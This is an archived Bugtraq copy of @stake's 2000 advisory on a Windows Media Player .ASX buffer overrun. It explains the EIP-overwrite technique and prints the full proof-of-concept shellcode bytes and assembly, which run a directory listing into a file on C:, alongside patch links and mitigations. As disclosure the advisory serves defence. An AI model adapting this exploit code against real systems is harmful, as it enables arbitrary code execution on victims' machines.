Bugtraq mailing list archives
@stake Advisory: Windows 2000 .ASX Buffer Overrun (A112300-1)
From: "@stake Advisories" <advisories () ATSTAKE COM>
Date: Thu, 23 Nov 2000 10:46:11 -0500
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 @stake Inc. www.atstake.com Security Advisory Advisory Name: Windows 2000 .ASX Buffer Overrun Release Date: 11/23/2000 Application: Microsoft Windows Explorer with Microsoft Media Player v6.xx and Microsoft Media Player v7.xx. Platform: Windows 2000 SP1 Severity: There is a buffer overflow condition that can result in execution of arbitrary code. Authors: Ollie Whitehouse [ollie () atstake com] Vendor Status: vendor has released patch Web: www.atstake.com/research/advisories/2000/a112300-1.txt Overview: Microsoft Windows Media Player (http://www.microsoft.com/) plays streaming media files which have the extension .ASX. There is a buffer overrun caused by the way that WMP deals with the .ASX file format when using the Web View option in Windows Explorer (enabled by default). This problem can allow the execution of arbitrary computer code. One method of exploitation requires the user to save the .ASX file down to the local machine and navigate to it via Explorer. Single clicking once on the file will cause Explorer to Auto-Preview the destination streaming media file which is specified in the .ASX file. Passing an overly long destination to this media file will cause the buffer overrun to occur and the abtirary code to execute. This is another good example of why attachments from unknown sources should not be trusted. Also why systems/network administrators should evaluate the types of attachments which are allowed to be passed to users desktops even though they may not contain any executable code. There are other methods of exploitation which could allow .ASX files to be opened automatically when a user visits a malicious web site. This can be prevented by configuring Internet Explorer not to run ActiveX controls. Proof of Concept: The following file once uncompressed contains 'Explorer-Win2k-BufferOverrun.asx'. Once this file is previewed within Explorer with a single click, it will cause Microsoft Explorer to create a file in the root of C: called !test!. This file will contain a directory listing of the current working directory when the proof of concept is executed. Once this proof of concept is executed it will require Explorer.exe to be restarted. This example has been hardcoded to work with Windows 2000 (SP1) and MSVCRT.DLL v6.1.8637. Another reason why this example is service-pack specific is that the code is randomly located on the stack (so EIP can not be pointed directly to the location of the arbitray code), EBX is located 4 bytes before EIP. The example overwrites EIP with the address of JMP EBX (FF E2, this instruction is contained in kernel32 and thus static). This in turn then tries to execute the value at EBX (which containes NOPs), then EIP (luckly this does not contain any code which alters or stops program flow) and then finally executes the arbitry code placed on the stack. The assembly code which is executed by this example at this point is contained at the end of this advisory. Within the ASX file the example code is contained at offset 00005ce4h. Proof of concept ASX File: An ASX file which contains the problem is contained in this .zip file: http://www.atstake.com/research/advisories/2000/asx-bufferoverrun.zip <-----<Assembly code for proof of concept>----- [Byte Code] [Assembly] 90 nop 8B DC mov ebx,esp 8B E3 mov esp,ebx 53 push ebx 8B DC mov ebx,esp 33 FF xor edi,edi 57 push edi 57 push edi 57 push edi 57 push edi 57 push edi 57 push edi 57 push edi C6 43 E9 63 mov byte ptr [ebx-17h],63h C6 43 EA 6D mov byte ptr [ebx-16h],6Dh C6 43 EB 64 mov byte ptr [ebx-15h],64h C6 43 EC 2E mov byte ptr [ebx-14h],2Eh C6 43 ED 65 mov byte ptr [ebx-13h],65h C6 43 EE 78 mov byte ptr [ebx-12h],78h C6 43 EF 65 mov byte ptr [ebx-11h],65h C6 43 F0 2F mov byte ptr [ebx-10h],2Fh C6 43 F1 63 mov byte ptr [ebx-0Fh],63h C6 43 F2 64 mov byte ptr [ebx-0Eh],64h C6 43 F3 69 mov byte ptr [ebx-0Dh],69h C6 43 F4 72 mov byte ptr [ebx-0Ch],72h C6 43 F5 3E mov byte ptr [ebx-0Bh],3Eh C6 43 F6 63 mov byte ptr [ebx-0Ah],63h C6 43 F7 3A mov byte ptr [ebx-9],3Ah C6 43 F8 5C mov byte ptr [ebx-8],5Ch C6 43 F9 21 mov byte ptr [ebx-7],21h C6 43 FA 74 mov byte ptr [ebx-6],74h C6 43 FB 65 mov byte ptr [ebx-5],65h C6 43 FC 73 mov byte ptr [ebx-4],73h C6 43 FD 74 mov byte ptr [ebx-3],74h C6 43 FE 21 mov byte ptr [ebx-2],21h B8 AD AA 01 78 mov eax,7801AAADh 50 push eax 8D 43 E9 lea eax,[ebx-17h] 50 push eax FF 53 E4 call dword ptr [ebx-1Ch] 56 push esi BB 2D F3 E8 77 mov ebx,77E8F32Dh FF D3 call ebx C3 ret <-----<End of code for proof of concept>----- Vendor Response: Microsoft has released a security bulletin describing the issue: http://www.microsoft.com/technet/security/bulletin/MS00-090.asp Microsoft has release patches for Windows Media Player: Windows Media Player 6.4: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26069 Windows Media Player 7: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26067 Recommendation: The best solution is to install the vendor patch for your version of the media player. This solves this specific problem. In general, unless you need to run ActiveX controls, it is a good idea to configure Internet Explorer not to run them. At the very least you can configure IE to not run ActiveX controls in the Internet Security Zone. It doesn't matter whether the controls are signed or not. As you can see from this advisory even signed controls can have security problems. Of course, never trust attachments from unknown sources, even data files such as the .ASX files discussed in this advisory. For more advisories: http://www.atstake.com/research/advisories/ PGP Key: http://www.atstake.com/research/pgp_key.asc Copyright 2000 @stake, Inc. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: PGP 7.0 iQA/AwUBOh07oVESXwDtLdMhEQJTMwCeKP4OnGqIS9GcKHSCBOaAyFdahJoAn37+ L5L7UwBkJOH5n0TQ0i2Qr3uY =DkFu -----END PGP SIGNATURE-----
Current thread:
- @stake Advisory: Windows 2000 .ASX Buffer Overrun (A112300-1) @stake Advisories (Nov 24)